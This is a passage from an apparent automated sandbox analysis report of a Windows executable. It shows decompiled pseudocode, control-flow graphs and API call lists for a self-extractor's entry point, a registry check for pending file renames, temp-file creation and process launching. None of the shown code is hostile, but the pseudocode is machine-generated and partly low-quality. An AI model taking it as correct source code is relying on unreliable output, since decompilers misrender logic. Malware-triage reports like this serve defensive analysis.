                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00104096,00104096,?,00101ED3,00000001,00000000,?,?,00104137,?), ref: 001025B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00104096,?,00101ED3,00000001,00000000,?,?,00104137,?,00104096), ref: 001025CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00101ED3,00000001,00000000,?,?,00104137,?,00104096), ref: 001025DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00104096,00104096,?,00101ED3,00000001,00000000,?,?,00104137,?), ref: 001025FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00104096,00000000,00000000,00000000,00000000,?,00101ED3,00000001,00000000), ref: 0010261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 001025C3
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 001025A8
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001025F5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: 00a5f43d91a453d6f7cc0e5f864739e810e45e02ab557cc3e023cb306beeff05
                                                                                                                                                                                                                                                • Instruction ID: d81ed09acab34bb883645aa2c7f1c29ea242935fec8735f6e2b3c5d3a12e8297
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a5f43d91a453d6f7cc0e5f864739e810e45e02ab557cc3e023cb306beeff05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28119135942228BBDF209B919C0DDFBBF7CEF017A1F508055F888E2080D7B04E48D6A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00106A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 577 106a60-106a91 call 107155 call 107208 GetStartupInfoW 583 106a93-106aa2 577->583 584 106aa4-106aa6 583->584 585 106abc-106abe 583->585 586 106aa8-106aad 584->586 587 106aaf-106aba Sleep 584->587 588 106abf-106ac5 585->588 586->588 587->583 589 106ad1-106ad7 588->589 590 106ac7-106acf _amsg_exit 588->590 592 106b05 589->592 593 106ad9-106ae9 call 106c3f 589->593 591 106b0b-106b11 590->591 594 106b13-106b24 _initterm 591->594 595 106b2e-106b30 591->595 592->591 599 106aee-106af2 593->599 594->595 597 106b32-106b39 595->597 598 106b3b-106b42 595->598 597->598 600 106b44-106b51 call 107060 598->600 601 106b67-106b71 598->601 599->591 602 106af4-106b00 599->602 600->601 610 106b53-106b65 600->610 604 106b74-106b79 601->604 605 106c39-106c3e call 10724d 602->605 608 106bc5-106bc8 604->608 609 106b7b-106b7d 604->609 611 106bd6-106be3 _ismbblead 608->611 612 106bca-106bd3 608->612 614 106b94-106b98 609->614 615 106b7f-106b81 609->615 610->601 618 106be5-106be6 611->618 619 106be9-106bed 611->619 612->611 616 106ba0-106ba2 614->616 617 106b9a-106b9e 614->617 615->608 620 106b83-106b85 615->620 622 106ba3-106bbc call 102bfb 616->622 617->622 618->619 619->604 624 106c1e-106c25 619->624 620->614 621 106b87-106b8a 620->621 621->614 625 106b8c-106b92 621->625 622->624 630 106bbe-106bbf exit 622->630 627 106c32 624->627 628 106c27-106c2d _cexit 624->628 625->620 627->605 628->627 630->608
                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00107155();
				_push(0x58);
				_push(0x1072b8);
				E00107208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x1088b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x1088b0; // 0x2
						if(__eflags != 0) {
							 *0x1081e4 = _t58;
							goto L13;
						} else {
							 *0x1088b0 = _t58;
							_t37 = E00106C3F(0x1010b8, 0x1010c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00106FF4();
						L13:
						_t68 =  *0x1088b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x1010b4);
							_push(0x1010ac);
							L00107202();
							 *0x1088b0 = 2;
						}
						if(_t53 == 0) {
							 *0x1088ac = 0;
						}
						_t71 =  *0x1088b4;
						if( *0x1088b4 != 0 && E00107060(_t71, 0x1088b4) != 0) {
							_t60 =  *0x1088b4; // 0x0
							 *0x10a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00102BFB(0x100000, 0, _t59); // executed
							 *0x1081e0 = _t30;
							__eflags =  *0x1081f8;
							if( *0x1081f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x1081e4;
							if( *0x1081e4 == 0) {
								__imp___cexit();
								_t30 =  *0x1081e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0010724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                                0x00106a60
                                                                                                                                                                                                                                                0x00106a6a
                                                                                                                                                                                                                                                0x00106a6c
                                                                                                                                                                                                                                                0x00106a71
                                                                                                                                                                                                                                                0x00106a78
                                                                                                                                                                                                                                                0x00106a7f
                                                                                                                                                                                                                                                0x00106a85
                                                                                                                                                                                                                                                0x00106a8e
                                                                                                                                                                                                                                                0x00106a91
                                                                                                                                                                                                                                                0x00106a93
                                                                                                                                                                                                                                                0x00106a9c
                                                                                                                                                                                                                                                0x00106aa2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106aa6
                                                                                                                                                                                                                                                0x00106ab4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106aa8
                                                                                                                                                                                                                                                0x00106aaa
                                                                                                                                                                                                                                                0x00106aab
                                                                                                                                                                                                                                                0x00106aab
                                                                                                                                                                                                                                                0x00106abf
                                                                                                                                                                                                                                                0x00106abf
                                                                                                                                                                                                                                                0x00106ac5
                                                                                                                                                                                                                                                0x00106ad1
                                                                                                                                                                                                                                                0x00106ad7
                                                                                                                                                                                                                                                0x00106b05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106ad9
                                                                                                                                                                                                                                                0x00106ad9
                                                                                                                                                                                                                                                0x00106ae9
                                                                                                                                                                                                                                                0x00106af0
                                                                                                                                                                                                                                                0x00106af2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106af4
                                                                                                                                                                                                                                                0x00106af4
                                                                                                                                                                                                                                                0x00106afb
                                                                                                                                                                                                                                                0x00106afb
                                                                                                                                                                                                                                                0x00106af2
                                                                                                                                                                                                                                                0x00106ac7
                                                                                                                                                                                                                                                0x00106ac7
                                                                                                                                                                                                                                                0x00106ac9
                                                                                                                                                                                                                                                0x00106b0b
                                                                                                                                                                                                                                                0x00106b0b
                                                                                                                                                                                                                                                0x00106b11
                                                                                                                                                                                                                                                0x00106b13
                                                                                                                                                                                                                                                0x00106b18
                                                                                                                                                                                                                                                0x00106b1d
                                                                                                                                                                                                                                                0x00106b24
                                                                                                                                                                                                                                                0x00106b24
                                                                                                                                                                                                                                                0x00106b30
                                                                                                                                                                                                                                                0x00106b39
                                                                                                                                                                                                                                                0x00106b39
                                                                                                                                                                                                                                                0x00106b3b
                                                                                                                                                                                                                                                0x00106b42
                                                                                                                                                                                                                                                0x00106b57
                                                                                                                                                                                                                                                0x00106b5f
                                                                                                                                                                                                                                                0x00106b65
                                                                                                                                                                                                                                                0x00106b65
                                                                                                                                                                                                                                                0x00106b67
                                                                                                                                                                                                                                                0x00106b6c
                                                                                                                                                                                                                                                0x00106b6e
                                                                                                                                                                                                                                                0x00106b71
                                                                                                                                                                                                                                                0x00106b74
                                                                                                                                                                                                                                                0x00106b74
                                                                                                                                                                                                                                                0x00106b79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106b7d
                                                                                                                                                                                                                                                0x00106b81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106b83
                                                                                                                                                                                                                                                0x00106b8c
                                                                                                                                                                                                                                                0x00106b8d
                                                                                                                                                                                                                                                0x00106b90
                                                                                                                                                                                                                                                0x00106b90
                                                                                                                                                                                                                                                0x00106b83
                                                                                                                                                                                                                                                0x00106b81
                                                                                                                                                                                                                                                0x00106b94
                                                                                                                                                                                                                                                0x00106b98
                                                                                                                                                                                                                                                0x00106ba2
                                                                                                                                                                                                                                                0x00106b9a
                                                                                                                                                                                                                                                0x00106b9a
                                                                                                                                                                                                                                                0x00106b9a
                                                                                                                                                                                                                                                0x00106ba3
                                                                                                                                                                                                                                                0x00106bab
                                                                                                                                                                                                                                                0x00106bb0
                                                                                                                                                                                                                                                0x00106bb5
                                                                                                                                                                                                                                                0x00106bbc
                                                                                                                                                                                                                                                0x00106bbf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106bbf
                                                                                                                                                                                                                                                0x00106c1e
                                                                                                                                                                                                                                                0x00106c25
                                                                                                                                                                                                                                                0x00106c27
                                                                                                                                                                                                                                                0x00106c2d
                                                                                                                                                                                                                                                0x00106c2d
                                                                                                                                                                                                                                                0x00106c32
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106bc5
                                                                                                                                                                                                                                                0x00106bc5
                                                                                                                                                                                                                                                0x00106bc8
                                                                                                                                                                                                                                                0x00106bcc
                                                                                                                                                                                                                                                0x00106bce
                                                                                                                                                                                                                                                0x00106bce
                                                                                                                                                                                                                                                0x00106bd1
                                                                                                                                                                                                                                                0x00106bd3
                                                                                                                                                                                                                                                0x00106bd3
                                                                                                                                                                                                                                                0x00106bd6
                                                                                                                                                                                                                                                0x00106bda
                                                                                                                                                                                                                                                0x00106be1
                                                                                                                                                                                                                                                0x00106be3
                                                                                                                                                                                                                                                0x00106be5
                                                                                                                                                                                                                                                0x00106be5
                                                                                                                                                                                                                                                0x00106be6
                                                                                                                                                                                                                                                0x00106be6
                                                                                                                                                                                                                                                0x00106be9
                                                                                                                                                                                                                                                0x00106bea
                                                                                                                                                                                                                                                0x00106bea
                                                                                                                                                                                                                                                0x00106b74
                                                                                                                                                                                                                                                0x00106c39
                                                                                                                                                                                                                                                0x00106c3e
                                                                                                                                                                                                                                                0x00106c3e
                                                                                                                                                                                                                                                0x00106abe
                                                                                                                                                                                                                                                0x00106abe
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00107182
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetCurrentProcessId.KERNEL32 ref: 00107191
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetCurrentThreadId.KERNEL32 ref: 0010719A
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetTickCount.KERNEL32 ref: 001071A3
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: QueryPerformanceCounter.KERNEL32(?), ref: 001071B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,001072B8,00000058), ref: 00106A7F
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00106AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 00106AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 00106B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00106B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 00106BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 00106BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: 76c3c6fc4871575921db7791a229bdfeaa11ee67454a790c03785b1415943e92
                                                                                                                                                                                                                                                • Instruction ID: 3655bcc02b61ed29e623e9619f4bcf31f9e2624eee035c604a4c5a216b1e3a94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76c3c6fc4871575921db7791a229bdfeaa11ee67454a790c03785b1415943e92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB41E2B1A08325DFEB21AB64DC0476A77E4BB48720F64802AF8C1E36D1CFF448918B90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001058C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 631 1058c8-1058d5 632 1058d8-1058dd 631->632 632->632 633 1058df-1058f1 LocalAlloc 632->633 634 1058f3-105901 call 1044b9 633->634 635 105919-105959 call 101680 call 10658a CreateFileA LocalFree 633->635 638 105906-105910 call 106285 634->638 635->638 645 10595b-10596c CloseHandle GetFileAttributesA 635->645 644 105912-105918 638->644 645->638 646 10596e-105970 645->646 646->638 647 105972-10597b 646->647 647->644
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E001058C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00101680(_t20, _t36, _t33);
					E0010658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x109124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x109124 = E00106285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                                0x001058cd
                                                                                                                                                                                                                                                0x001058d1
                                                                                                                                                                                                                                                0x001058d3
                                                                                                                                                                                                                                                0x001058d5
                                                                                                                                                                                                                                                0x001058d8
                                                                                                                                                                                                                                                0x001058d8
                                                                                                                                                                                                                                                0x001058da
                                                                                                                                                                                                                                                0x001058db
                                                                                                                                                                                                                                                0x001058e1
                                                                                                                                                                                                                                                0x001058ed
                                                                                                                                                                                                                                                0x001058f1
                                                                                                                                                                                                                                                0x0010591e
                                                                                                                                                                                                                                                0x0010592c
                                                                                                                                                                                                                                                0x00105943
                                                                                                                                                                                                                                                0x0010594a
                                                                                                                                                                                                                                                0x0010594d
                                                                                                                                                                                                                                                0x00105953
                                                                                                                                                                                                                                                0x00105959
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010595b
                                                                                                                                                                                                                                                0x0010595c
                                                                                                                                                                                                                                                0x00105963
                                                                                                                                                                                                                                                0x0010596c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00105972
                                                                                                                                                                                                                                                0x00105974
                                                                                                                                                                                                                                                0x0010597a
                                                                                                                                                                                                                                                0x0010597a
                                                                                                                                                                                                                                                0x0010596c
                                                                                                                                                                                                                                                0x001058f3
                                                                                                                                                                                                                                                0x00105901
                                                                                                                                                                                                                                                0x00105906
                                                                                                                                                                                                                                                0x0010590b
                                                                                                                                                                                                                                                0x00105910
                                                                                                                                                                                                                                                0x00105910
                                                                                                                                                                                                                                                0x00105918

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001058E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-188559970
                                                                                                                                                                                                                                                • Opcode ID: 8359cde92b1d1b1bfba43b57cbbc787e7a83e09042f5fec1580d9b82cc50865f
                                                                                                                                                                                                                                                • Instruction ID: ab32c1b6d6d7774ab8d13f0f176c040437e5269e197209b0a88b7290d59e3c57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8359cde92b1d1b1bfba43b57cbbc787e7a83e09042f5fec1580d9b82cc50865f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31112271700210ABC7241F7AAC4DA9B7E9EEF46374B104619B6CAD31D1CBF088558AA0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00103FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 675 103fef-104010 676 104016-10403b CreateProcessA 675->676 677 10410a-10411a call 106ce0 675->677 678 104041-10406e WaitForSingleObject GetExitCodeProcess 676->678 679 1040c4-104101 call 106285 GetLastError FormatMessageA call 1044b9 676->679 682 104070-104077 678->682 683 104091 call 10411b 678->683 691 104106 679->691 682->683 686 104079-10407b 682->686 690 104096-1040b8 CloseHandle * 2 683->690 686->683 689 10407d-104089 686->689 689->683 692 10408b 689->692 693 104108 690->693 694 1040ba-1040c0 690->694 691->693 692->683 693->677 694->693 695 1040c2 694->695 695->691
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E00103FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00106CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x109124 = E00106285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E001044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x108a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x109a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x109a2c = _t44;
						}
					}
				}
				E0010411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x109a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                                0x00103fef
                                                                                                                                                                                                                                                0x00103ffa
                                                                                                                                                                                                                                                0x00104001
                                                                                                                                                                                                                                                0x00104008
                                                                                                                                                                                                                                                0x0010400a
                                                                                                                                                                                                                                                0x0010400b
                                                                                                                                                                                                                                                0x00104010
                                                                                                                                                                                                                                                0x0010410a
                                                                                                                                                                                                                                                0x0010411a
                                                                                                                                                                                                                                                0x0010411a
                                                                                                                                                                                                                                                0x0010401c
                                                                                                                                                                                                                                                0x0010401d
                                                                                                                                                                                                                                                0x0010401e
                                                                                                                                                                                                                                                0x0010401f
                                                                                                                                                                                                                                                0x00104033
                                                                                                                                                                                                                                                0x0010403b
                                                                                                                                                                                                                                                0x001040ca
                                                                                                                                                                                                                                                0x001040e9
                                                                                                                                                                                                                                                0x001040f8
                                                                                                                                                                                                                                                0x00104101
                                                                                                                                                                                                                                                0x00104106
                                                                                                                                                                                                                                                0x00104106
                                                                                                                                                                                                                                                0x00104108
                                                                                                                                                                                                                                                0x00104108
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104108
                                                                                                                                                                                                                                                0x00104049
                                                                                                                                                                                                                                                0x0010405c
                                                                                                                                                                                                                                                0x00104062
                                                                                                                                                                                                                                                0x00104068
                                                                                                                                                                                                                                                0x0010406e
                                                                                                                                                                                                                                                0x00104070
                                                                                                                                                                                                                                                0x00104077
                                                                                                                                                                                                                                                0x0010407f
                                                                                                                                                                                                                                                0x00104089
                                                                                                                                                                                                                                                0x0010408b
                                                                                                                                                                                                                                                0x0010408b
                                                                                                                                                                                                                                                0x00104089
                                                                                                                                                                                                                                                0x00104077
                                                                                                                                                                                                                                                0x00104091
                                                                                                                                                                                                                                                0x0010409c
                                                                                                                                                                                                                                                0x001040a8
                                                                                                                                                                                                                                                0x001040b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001040c2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001040c2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00104033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00104049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 0010405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0010409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 001040A8
